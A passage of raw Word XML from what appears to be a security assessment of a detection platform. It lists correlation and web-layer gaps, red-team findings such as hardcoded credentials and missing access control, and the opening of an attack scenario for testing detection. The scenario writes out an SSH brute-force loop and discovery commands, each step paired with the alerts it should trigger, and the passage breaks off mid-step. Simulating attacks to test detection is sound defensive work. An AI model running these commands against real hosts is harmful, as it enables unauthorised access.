            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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94B62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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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DC7D8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Inconsistent assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="06266A0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E0B79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COR-03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AEC2F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All rules use 300s window</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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3AEFF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P2</w:t>
            </w:r>
          </w:p>
        </w:tc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D6A5E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Long attacks missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0747943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F164B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COR-04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6FD1B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No cross-device correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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8E80C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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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AFC22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Coordinated attacks missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="76F69AE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E0973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COR-05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D6A34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Hardcoded time windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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0162B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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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F622F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No tuning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="657B748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2B84F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COR-06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5A7B6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Missing Impact tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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FB215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P2</w:t>
            </w:r>
          </w:p>
        </w:tc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F959C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Destruction undetected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="53392C0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29711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COR-07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A4536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No delayed event recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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E00E3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P2</w:t>
            </w:r>
          </w:p>
        </w:tc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4B6E4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Patient attacks missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="535B1BA0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="693FB877" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 7: Cortex / Web Layer (Phase 6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C94AA49" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>7.1 Application Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E55926D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flask app factory with 15+ blueprints, 219+ routes. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SocketIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for real-time communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DF4C9F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>7.2 API Surface Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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7"/>
        <w:gridCol w:w="1535"/>
        <w:gridCol w:w="2451"/>
        <w:gridCol w:w="2917"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="3836211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1B2A4A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B2E54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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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D19B1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Routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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F7897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Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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1F1CD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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="086BF7D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10EA2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Agent Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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B2010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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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9DD08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JWT</w:t>
            </w:r>
          </w:p>
        </w:tc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13FDD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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3EDF6AC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F1AC4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Agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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2A520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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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580E2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JWT</w:t>
            </w:r>
          </w:p>
        </w:tc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E4A26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LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="52B1B45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0E988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Events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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BBC94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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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E601E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JWT</w:t>
            </w:r>
          </w:p>
        </w:tc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A3D62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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="76B3AC4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F477E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Telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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66BDE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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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4D4E0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Session</w:t>
            </w:r>
          </w:p>
        </w:tc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77C2D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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="02026F6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50924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Database Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C92C1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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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6C66F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Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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785BD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E74C3C"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6E2BFE8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9017C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Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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AD2EE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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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ADFFB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Session</w:t>
            </w:r>
          </w:p>
        </w:tc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F931F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LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4AE0469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05AF5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Dashboard API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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E41A5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20+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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92C35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Session</w:t>
            </w:r>
          </w:p>
        </w:tc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1E237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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="58E2B18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05324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Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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24879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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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30CDE" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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Session+Admin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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1825A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LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="05C515E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0709E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User Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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D0D33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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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05962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Mixed</w:t>
            </w:r>
          </w:p>
        </w:tc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1E82E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LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="204C255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66661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Health</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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2962B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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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7BDED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Mixed</w:t>
            </w:r>
          </w:p>
        </w:tc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DD975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LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24421BAE" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172CB336" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>7.3 Integrity Surface — Red Team Assessment</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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0"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="3434"/>
        <w:gridCol w:w="1769"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="6A92C21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1B2A4A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3DFA8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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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7FCFB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Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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117ED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Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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FCAC5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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3589BC7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C634B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Can UI show tampered data?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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9E88D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E74C3C"/>
              </w:rPr>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc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B1474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API unsigned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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C9EEE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E74C3C"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7103A01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F2CCC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Is hash chain visible in UI?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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6373E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NO</w:t>
            </w:r>
          </w:p>
        </w:tc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23B02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No hash fields in API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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EC260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P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="76B992A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14336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Can admin modify incidents?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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C3294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E74C3C"/>
              </w:rPr>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc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D27F1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No audit trail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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209A9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P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4FFA413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CE178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Can database manager destroy evidence?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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2A4B7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E74C3C"/>
              </w:rPr>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc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5DE72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No RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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36659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E74C3C"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="33F88AE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5CA5A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Are API responses signed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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0CEF0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NO</w:t>
            </w:r>
          </w:p>
        </w:tc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FAAC6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Plain JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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742C0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P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="58A3D02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5A0E0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Can WebSocket data be spoofed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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98CDD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E74C3C"/>
              </w:rPr>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc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DCBCF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No message signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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08FA7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P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="46BC799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499B8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Can credentials be extracted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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9FADD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E74C3C"/>
              </w:rPr>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc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9D403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Hardcoded in source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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76E3A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E74C3C"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="479088FD" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE43F89" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>7.4 Cortex Gaps</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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8"/>
        <w:gridCol w:w="3376"/>
        <w:gridCol w:w="1841"/>
        <w:gridCol w:w="2915"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="5CAE750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1B2A4A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61447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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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4D9C3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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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2CBE1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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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45FDD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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="34B4463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D76C6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CTX-01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257DC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Database manager NO RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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142CD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E74C3C"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc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C8EEF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Any user wipes DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="164679C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641DD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CTX-02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97043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No rate limiting on destructive ops</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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47DED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E74C3C"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc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FD7CB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Evidence destruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="743E46C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A00CA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CTX-03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CFBC9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Agent credentials hardcoded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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3FC8D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E74C3C"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc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C7F59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Exposed in git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4D6E756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F45FF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CTX-04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D1689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Hash chain NOT exposed to UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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669E0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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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883A0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No integrity proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="5D8AB3A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9E56E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CTX-05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3629D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No audit trail on changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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AD69C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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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7F3A4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Unattributed mods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4AFEF30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B7FD6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CTX-06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410FB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WebSocket over-broadcasts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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C37AA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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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03D5D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Isolation gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="784F61A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D1527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CTX-07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13DF4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Events API in-memory store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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289BE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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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AF82B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Lost on restart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="52836B7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27AA5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CTX-08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7D526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API responses unsigned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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8D809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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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4CB2D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MITM risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16BF9B11" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC89EE" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 8: Golden Attack Scenario (Phase 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934567D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>8.1 Attack Scenario Alpha: APT Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E6C9E2" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Initial Access (SSH Brute Force)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBC016" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in $(seq 1 5); do ssh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>baduser@target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2&gt;/dev/null; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864F5CA" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>validuser@target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  # Success with stolen creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64363281" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3C5CD4" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expected telemetry: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AuthGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → 5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FailedAuthenticationProbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>. Expected rules: Rule #1 (SSH Brute Force).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC1DBF3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Step 2 — Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741FD630" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp;&amp; id &amp;&amp; </w:t>
      </w:r>
